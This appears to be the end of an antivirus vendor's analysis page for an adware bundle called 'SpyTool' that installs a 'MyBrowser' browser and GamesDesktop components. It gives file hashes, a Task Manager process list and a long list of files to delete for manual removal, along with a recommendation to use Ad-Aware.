a25f20a5664891bc292970bd23acbf21 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\libglesv2.dll |
302f011627a16ce5555e39ec53d4fbdd | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\metro_driver.dll |
814cb49f7706f681723ea9b5746987e4 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\nacl64.exe |
90871478e7b9765cccb884751bfafc7b | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\pdf.dll |
4120c792ee30c922d95c5201cedade29 | c:\Program Files\MyBrowser\MyBrowser\Application\mybrowser.exe |
690f4b16c53bec409e4f465cfb4231a3 | c:\Program Files\MyBrowser\MyBrowser\Application\utility.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
upgmsd_re_005010096.exe:1276
nsf2B.tmp:1664
nsf2B.tmp:668
nswA.tmp:1336
gmsd_re_005010096.exe:592
nsr19.tmp:204
nsdF.tmp:1060
fsd34.exe:1692
nsw42.tmp:660
setup.exe:1356
taskkill.exe:1804
taskkill.exe:1796
taskkill.exe:660
nsj32.tmp:1912
amisid.exe:1952
amisid.exe:1844
tasklist.exe:1852
tasklist.exe:324
nss12.tmp:1616
9823.exe:320
nsx36.tmp:1468
encrypt.exe:1060
encrypt.exe:1476
encrypt.exe:1100
encrypt.exe:1584
nsx1C.tmp:1896
nsx1C.tmp:1088
nst25.tmp:1804
nsk6.tmp:204
%original file name%.exe:1736
- Delete the original SpyTool file.
- Delete or disinfect the following files created/modified by the SpyTool:
%Documents and Settings%\%current user%\Cookies\index.dat (788 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@prof.youandmeandmeandyouhihi[1].txt (227 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@youandmeandmeandyouhihi[1].txt (176 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\upgmsd_re_005010096.cyl (428 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\GAMESDESKTOP\GamesDesktop.lnk (812 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp (4 bytes)
%Program Files%\gmsd_re_005010096\predm.exe (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\upgmsd_re_005010096.7z (7433 bytes)
%Program Files%\gmsd_re_005010096\gmsd_re_005010096.exe (29430 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\is-UGOR9.tmp (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\CheckProc.cmd (288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\predm.7z (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\is-9SIQI.tmp (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\_isetup\_shfoldr.dll (23 bytes)
%Program Files%\gmsd_re_005010096\unins000.msg (375 bytes)
%Program Files%\gmsd_re_005010096\gamesdesktop_widget.exe (77005 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\is-LKR89.tmp (15278 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\upgmsd_re_005010096.exe (23062 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\encrypt.exe (4185 bytes)
%Program Files%\gmsd_re_005010096\is-FEB6H.tmp (22284 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\is-L9FO9.tmp (8657 bytes)
%Program Files%\gmsd_re_005010096\unins000.dat (29605 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\itdownload.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\gmsd_re_005010096.7z (8657 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\ex.bat (1564 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\is-P9554.tmp (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\gamesdesktop_widget.7z (15278 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-KUMK3.tmp\nsf2B.tmp (3781 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsnD.tmp (7695 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\gmsd_re_005010096\1.20\cnf.cyl (269 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx1D.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\Bundle_OperaRUnew[1].exe (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx1C.tmp (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\9823.exe (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\f9626892-7a78-3199-abd2-97bbce96297b\OfferInstaller.exe (1617 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst4A.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst49.tmp (19514 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst4A.tmp\WmiInspector.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst4A.tmp\flush-inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst4A.tmp\UserInfo.dll (4 bytes)
%Program Files%\AnyProtectEx\product.guid (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst4A.tmp\System.dll (11 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\VisualElements\smalllogo.png (9 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\sv.pak (207 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\chrome.7z (1161171 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\MyBrowser\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\sl.pak (211 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\pdf.dll (67091 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\VisualElementsManifest.xml (392 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\pt-PT.pak (222 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\hr.pak (214 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\metro_driver.dll (1765 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\PepperFlash\manifest.json (2 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\es.pak (230 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\chrome.dll (237340 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\fi.pak (213 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\pl.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\vi.pak (247 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\hi.pak (1712 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\he.pak (253 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\delegate_execute.exe (12288 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe (5873 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ko.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\id.pak (202 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\fa.pak (308 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\sr.pak (1610 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\nl.pak (216 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Extensions\external_extensions.json (103 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\mybrowser.exe (3869 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\chrome_100_percent.pak (7386 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\VisualElements\logo.png (5 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\ffmpegsumo.dll (6337 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\da.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\en-US.pak (189 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\lt.pak (221 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\icudtl.dat (76792 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\lv.pak (225 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\de.pak (224 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\master_preferences (814 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\sw.pak (208 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\libglesv2.dll (5442 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\chrome_200_percent.pak (7972 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\resources.pak (121304 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\zh-CN.pak (187 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\am.pak (302 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\d3dcompiler_46.dll (22433 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\nacl64.exe (12288 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\mr.pak (1708 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\libegl.dll (204 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\en-GB.pak (189 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\sk.pak (229 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\chrome_child.dll (261193 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ml.pak (1826 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\es-419.pak (226 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\kn.pak (1768 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\fil.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\fr.pak (239 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\el.pak (1667 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ta.pak (1784 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe (6841 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\pt-BR.pak (217 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\bg.pak (1640 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\nb.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\PepperFlash\pepflashplayer.dll (122658 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\bn.pak (1731 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ja.pak (266 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\VisualElements\splash-620x300.png (11 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ca.pak (227 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\cs.pak (223 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\wow_helper.exe (67 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe (6841 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\secondarytile.png (3 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ro.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\zh-TW.pak (190 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ru.pak (1612 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\te.pak (1761 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\chrome_elf.dll (125 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\uk.pak (1621 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\nacl_irt_x86_64.nexe (20507 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\it.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\nacl_irt_x86_32.nexe (15801 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\th.pak (1702 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\et.pak (201 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ar.pak (293 bytes)
%Documents and Settings%\All Users\Desktop\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\hu.pak (235 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\gu.pak (1705 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\libexif.dll (303 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ms.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\tr.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\39.5.2171.95.manifest (222 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\FinalInstaller_dotnet4[1].exe (1479345 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\fsd34.exe (388270 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\weather_channel.ico (5593 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ebay.ico (55 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\msn.ico (36 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\espn.ico (36 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\pinterest.ico (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\bestbuy.ico (3913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\tumblr.ico (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\imdb.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\utility.exe (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\tripadvisor.ico (1917 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\linkedin.ico (37 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\groupom.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\bbc.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\groupom.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\booking.com.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\gizmodo.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\hotels.com.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\cnn.ico (45 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\gmail.ico (47 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bing.ico (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\espn.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\ikea.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bbc.ico (35 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\etsy.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\youtube.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\yahoo_mail.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\nfl.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ted.ico (57 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\ie.zip[1].004 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\ie.zip[1].005 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\ie.zip[1].001 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\ie.zip[1].002 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\ie.zip[1].003 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\netflix.ico (1909 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_plus.ico (64 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\search.ico (57 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\booking.com.ico (45 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\netflix.ico (51 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\priceline.ico (53 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bestbuy.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\twitter.ico (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\pinterest.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\huffingtonpost.ico (1909 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\walmart.ico (48 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\amazon.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_news.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\agoda.ico (61 bytes)
%WinDir%\Tasks\27A66B06-9E26-42DD-B887-47E55490B3.job (1644 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\target.ico (50 bytes)
%WinDir%\Tasks\MyBrowser.job (1966 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\9gag.ico (56 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_finance.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yandex.ico (35 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nytimes.ico (61 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\skype.ico (44 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\huffingtonpost.ico (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\forbes.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\etsy.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\walmart.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\prefs (823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\gmail.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\kayak.com.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yelp.ico (42 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_search.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\mail.ru.ico (1909 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\weather_channel.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\yahoo_finance.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\setup.exe (37305 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_translate.ico (38 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\reddit.ico (60 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\mail.ru.ico (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\wikipedia.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\forbes.ico (40 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\imdb.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\mail_live_msn.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\9gag.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\bing.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (313192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\amazon.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\expedia.ico (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\cnn.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\yelp.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\nytimes.ico (1921 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\icon.json (9 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nba.ico (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\msn.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\target.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\agoda.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\theguardian.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\google_news.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\yandex.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\theguardian.ico (42 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\mail_live_msn.ico (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\facebook.ico (3913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\kayak.com.ico (47 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_mail.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\twitter.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\linkedin.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\priceline.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\chrome.packed.7z (1312726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\yahoo_search.ico (5593 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo.ico (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\ted.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\wikipedia.ico (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\nba.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\tripadvisor.ico (58 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\search.ico (1917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\tumblr.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ikea.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\icon.json (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\gizmodo.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nfl.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\yahoo.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\facebook.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\google_plus.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\reddit.ico (1917 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\hotels.com.ico (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\27A66B06-9E26-42DD-B887-47E55490B3\27A66B06-9E26-42DD-B887-47E55490B3.exe (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\ebay.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\youtube.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\skype.ico (1597 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\chrome.dat (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\expedia.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\google_translate.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd3A.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz3B.tmp (43 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@histats[1].txt (199 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\0[1].gif (43 bytes)
